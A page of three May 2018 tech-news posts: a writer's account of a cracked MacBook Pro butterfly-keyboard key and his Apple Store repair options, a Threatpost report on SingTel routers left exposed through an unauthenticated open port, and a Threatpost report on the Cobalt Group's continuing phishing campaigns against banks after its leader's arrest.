Month: May 2018

My experience with the MacBook Pro keyboard debacle and what an Apple Store did for me

Dan Uff May 29, 2018 0

By: Dan Uff, Senior Editor, CompuScoop.com

The other day, I was working on my 2017 MacBook when the down arrow key felt funny. Then, without warning, the down arrow key came off with my finger when I used it.

Thinking it was an isolated problem, and for the hell of it, I decided to do a search on YouTube to see if anyone else having a problem with the keyboard. Much to my surprise, I found over 200 YouTube videos describing almost the same problem as me. As it turns out, the problem seems to be a flaw in the design with Apple's new butterfly keyboard design. While some problems were fixed by air spraying the keyboard with a can of air, other users found that the internal design of the butterfly keys break the actual key and (in my case) actually crack it.

After putting up with the problem for a day, I decided to make an appointment to take it in to my local Apple Store to have it looked at. When I told the Apple Genius, he took the computer back and actually took the effected key off (or it fell off, one of the two). He then verified that the actual key was cracked. So I had two choices, he could try to clean the effected key and hope the problem doesn't happen again, or I could get the whole keyboard replaced for a minimum charge of $420.00. I voted for him to clean the key and hope it doesn't happen again, because I am on an limited income and could not afford the fee.

I am writing this to let other MacBook Pro users know that they are NOT ALONE, and to ask Apple to do a minatory recall on these keyboard, because I am not the only one who has this problem and to make things right with their customers.

What do YOU think? Comment below.

P.S. I forwarded this letter to Apple's CEO, Tim Cook. I'll report if someone gets back to me about the above.

Singapore ISP Leaves 1,000 Routers Open to Attack

Threatpost Security News May 28, 2018 0

Southeast Asian telcom giant Singapore Telecommunications Limited left approximately 1,000 customer routers wide open to a potential attack via an unprotected port. The flub occurred after the region’s largest ISP conducted remote maintenance on affected routers and failed to secure equipment when the work was complete, according to NewSky Security.

“The root cause was that port forwarding was enabled by the SingTel customer service staff to troubleshoot WiFi issues for their customers and it was not disabled when the issues were resolved,” said Ankit Anubhav, principal security researcher at NewSky Security, who discovered the security lapse last week.

NewSky Security alerted the region’s Singapore Computer Emergency Response Team (SingCERT) that worked with Singapore Telecommunications Limited (SingTel) to resolve the issue.

“The ISP SingTel has disabled port forwarding to port 10,000 for the affected routers… ISP SingTel will be taking measures to ensure that port forwarding is disabled after troubleshooting has completed,” said Douglas Mun, deputy director of SingCERT at the Cyber Security Agency of Singapore.

SingTel did not respond to a Threatpost request for comment for this story. The researcher identified the impacted routers as part of Singtel’s own branded Wifi Gigabit Routers. According to NewSky, affected routers have been secured.

The open port left routers vulnerable to a number of different type attacks. “A hacked router can allow an attacker to reconfigure the router to re-route traffic, monitor the data packets, or even plant a malware,” Anubhav wrote post describing his discovery posted Monday.

He asserts that even with heightened awareness around insecure routers and IoT devices, spurred by Mirai and other similar attacks, errors like this are still too common. “On connecting through this port, we observed that one can get complete access to these devices as there was no authentication set on these devices,” Anubhav wrote. “The login feature of these devices was set to be disabled.”

That allowed researchers to use Shodan to scan for port 10,000 on the SingTel routers and login as the devices Admin. Once in, researchers said attackers would not only be able to manipulate or snoop on network traffic, but also would have easy access to devices on the compromised network.

Routers are juicy targets for hackers to plant malware and cybercriminals to perpetrate DNS hijacking of unsecured WiFi routers.

Earlier this month, Anubhav identified 5,000 Datacom routers with no Telnet password tied to a Brazilian ISP, Oi Internet. Last week, the FBI warned of malware called VPNFilter that it said had infected 500,000 routers tied to brands Linksys, MikroTik, NETGEAR and TP-Link. Also last week, Comcast patched a bug that under certain conditions leaked customer SSID names and passwords of Xfinity routers.

Despite Ringeader’s Arrest, Cobalt Group Still Active

Threatpost Security News May 28, 2018 0

Evidence has surfaced that the Cobalt Group – the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe – is continuing to operate, despite the arrest of its accused ringleader in March.

The Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.

In a report released last week (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target’s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it’s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.

“Although [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group’s previous attacks,” they noted.

Cobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.

The new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.

“Cobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,” explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers’ success rate jumps to 33 percent.

As for how the rest of the May attack unfolded, PT security researchers said that once one of the exploits is triggered, a BAT script runs that launches a standard Windows utility that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.

The resurgence is notable given that the Spanish National Police arrested the Cobalt Group’s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.